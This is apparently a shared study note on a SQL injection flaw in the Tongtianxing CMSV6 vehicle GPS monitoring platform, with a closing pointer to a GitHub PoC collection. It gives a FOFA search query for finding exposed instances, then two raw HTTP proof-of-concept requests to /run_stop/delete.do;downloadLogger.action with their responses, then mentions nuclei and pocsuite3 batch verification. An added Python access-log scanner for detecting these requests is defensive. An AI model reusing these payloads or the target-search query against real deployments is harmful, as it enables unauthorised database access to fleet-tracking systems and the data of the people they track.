Disclaimer:

This article is a shared study note, provided for technical learning and reference only. Do not use it for any illegal purpose. Any direct or indirect consequences or losses caused by any individual or organization using the information provided in this article are the sole responsibility of the user and have nothing to do with the author!!!

Vulnerability description

The 通天星 CMSV6 (Tongtianxing CMSV6) vehicle GPS monitoring platform does not effectively filter user input and concatenates it directly into SQL query statements, which results in a SQL injection vulnerability.

FOFA query

body="/808gps/"

Vulnerability reproduction

Open the page

[screenshot]

Construct the payload

[screenshots]

payload_1 request

GET /run_stop/delete.do;downloadLogger.action?ids=1)--+&loadAll=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

payload_1 response

HTTP/1.1 200 
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85

{"result":0,"message":"OK","data":"","pagination":"","infos":"","key":"","resMap":""}

payload_2 request

GET /run_stop/delete.do;downloadLogger.action?ids=1)&loadAll=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

payload_2 response

HTTP/1.1 200 
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85

{"message":"服务器异常","result":10001}
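
As an added detection example (not part of the original post): the two requests above leave a recognisable trace in a web server access log. The Python below, run over constructed sample log lines, flags requests whose path carries a `;downloadLogger.action` path-parameter segment or whose `ids` value contains an unbalanced `)` or a SQL comment token, the two features that distinguish payload_1 and payload_2 from an ordinary `/run_stop/delete.do?ids=...` call. The log lines, timestamps and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format); not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2024:15:48:00 +0000] "GET /run_stop/delete.do;downloadLogger.action?ids=1)--+&loadAll=1 HTTP/1.1" 200 85
10.0.0.5 - - [02/Apr/2024:15:48:01 +0000] "GET /run_stop/delete.do;downloadLogger.action?ids=1)&loadAll=1 HTTP/1.1" 200 85
10.0.0.7 - - [02/Apr/2024:15:50:12 +0000] "GET /run_stop/delete.do?ids=1024 HTTP/1.1" 200 85
10.0.0.9 - - [02/Apr/2024:15:51:30 +0000] "GET /808gps/login.html HTTP/1.1" 200 2048
"""

# Request line inside the quoted part of a Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# SQL comment openers and a string delimiter; '--' is what payload_1 uses to balance the query.
SQL_TOKEN_RE = re.compile(r"(--|/\*|')")


def analyze_request_target(target: str) -> dict:
    """Return the handler path and a list of findings for one request target (path + query)."""
    parts = urlsplit(target)  # urlsplit keeps ';...' inside .path, unlike urlparse
    findings = []
    # ';name.action' after the real path is a path-parameter (matrix) segment; the request is
    # still routed to /run_stop/delete.do, so its presence alone is worth an alert.
    if ";" in parts.path:
        findings.append("path_parameter_segment")
    # parse_qs already percent-decodes and turns '+' into a space ('1)--+' -> '1)-- ').
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if value.count(")") > value.count("("):
                findings.append(f"unbalanced_paren:{name}")
            if SQL_TOKEN_RE.search(value):
                findings.append(f"sql_comment_or_quote:{name}")
    return {"path": parts.path.split(";")[0], "findings": findings}


def scan_log(text: str) -> list:
    """Scan access-log text and return one alert dict per request with findings."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        result = analyze_request_target(match.group("target"))
        if result["findings"]:
            alerts.append({"line": line, "method": match.group("method"), **result})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["path"], alert["findings"])
```

Only the two PoC-shaped requests produce alerts; the plain `ids=1024` call and the login page do not, which keeps the rule usable as a WAF or SIEM signature for this endpoint.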

Batch verification with nuclei (template obtained from GitHub)

[screenshot]

Verification with pocsuite3 (PoC obtained from GitHub)

[screenshot]

GitHub PoC collection: https://github.com/AYcg/poc